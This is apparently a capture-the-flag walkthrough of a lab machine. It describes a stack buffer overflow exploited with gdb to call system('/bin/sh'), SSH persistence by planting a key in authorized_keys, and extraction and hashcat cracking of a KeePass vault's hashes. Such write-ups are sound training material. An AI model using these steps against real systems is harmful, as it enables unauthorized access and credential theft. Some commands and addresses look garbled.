Hello Everyone !
The victim of this week’s Hallcode.
With the “info functions” command, you can see the functions which exist in the application.
Now let’s create 200 bytes of data with the “pattern create” command and run our application and enter the data.
pattern create 200
By sending 200 Bytes of data, I caused the app to crash. But we don’t know how many apps crashed after the Byte. We will now use the “registers” command to list all registers and learn the 64-bit value on the rsp (register stack point). “rsp” is a stack pointer register, pointing to the top of the current stack frame.
pattern search $rsp
Using the “pattern search” command, we learn that the application overflows after 120 Bytes. When more than 120 bytes of data is written to memory, this data will continue to be copied onstack. In this case, we can specify the code that we want to run as input to the program and exploit RIP by redirecting it to this code (JMP RSP).
2- Initial Foothold and Exploit Development
Every program becomes machine language when compiled. They can be converted to assembly codes. It’s called disassembly. Now, with the “info functions” command, let’s dive into the assembly code of testing function.
With the JMP command, we can jump anywhere in the program. If we can enter the value we want on rsp, we will be able to call the system() using the r13 tag.
Using system(), we can execute any command that can run on terminal if operating system allows. For example, we can call system(“/bin/sh”) on Linux to get shell.
python exploit.py > chain
break * 0x401156
r < chain
After i start gdb, I stop applying with a breakpoint command to 0x401156. This will determine which register the “/bin/sh” directory is in.
As seen in Figure – 19, we will able to print “/bin/sh” on our rsp point. Now, we will use the “si” command to move on to the next process and print “/bin/sh” to rsp.
The value “/bin/sh” in rsp will be copied to the rdi register with the mov command. Let’s use the “si” command again.
As you can see, we called the system function with the call method and were able to use the value “/bin/sh”. The summary of the figure above is this: system(“/bin/sh”)
Now we’re going to connect to port 1337 and do the same process from there. To do this, we add commands to make the necessary connection to python file.
3- Privilege Escalation
Now we need to download the files in Figure – 23. You remember, Port 22 was active, and we can use this port to connect with our remote machine. The first thing to do is to add the ssh key to the user’s authorized_keys file in the .ssh folder. Otherwise, our connection request will be rejected. You can follow the following command;
ssh-keygen -t rsa
We’re adding the key we’ve created to the target machine.
echo “your key” > .ssh/authorized_keys
Since we can establish an SSH connection, we can transfer files with the scp command. Secure Copy is a command used to transfer files between two servers that go online. The following is the use of the command;
scp -i id_rsa firstname.lastname@example.org:*
We see 6 landscape images, myapp app, user flag and a .kdbx file extension. We learn that “.kdbx” is a password vault called KeePass that allows you to store your accounts and passwords on various websites as cryptoly on the client (or on a server) and easily use it when needed.
After reviewing an app called KeePass, I understand that one of these 6 images may be the key to “MyPasswords.kdbx” so that we can access the database with the passwords.
What we need to do is download the following script and take the hashs from the “MyPasswords.kdbx” database with pictures.
NOTE: I used my virtual kali machine because I was making an error while using a tool called Keepass2john.
for i in $(ls *.JPG); do python keepass2john.py $i MyPasswords.kdbx | sed “s/MyPasswords/$i/g”; done
By creating a for loop, I’m checking to see if I can print the names of all the pictures in the terminal. Then I use our tool named keepass2john to reveal all the hashes. But since I have to remove the name of the database, I am using the sed method. Because the hash must be the simplest. After this process, we copy our output into a file.
I go back to my physical machine to detect the password because the process is slower in the virtual.
hashcat -h | grep -i keepass
hashcat -m 13400 -O keepass_hashes rockyou.txt –user –force
The result came quickly to me as I had previously decrypt. As seen in the figure, we detected that the picture named IMG_0547.JPG is the key and the password in the database is bullshit. Now I will install KeePass on my Windows 10 virtual machine and try the key and password which we found.
After copying the password, I go back to the physical and reconnect with the ssh key which I’ve created before.
I can say that it is one of the most enjoyable machines I have solved… We’re at the end of our Ha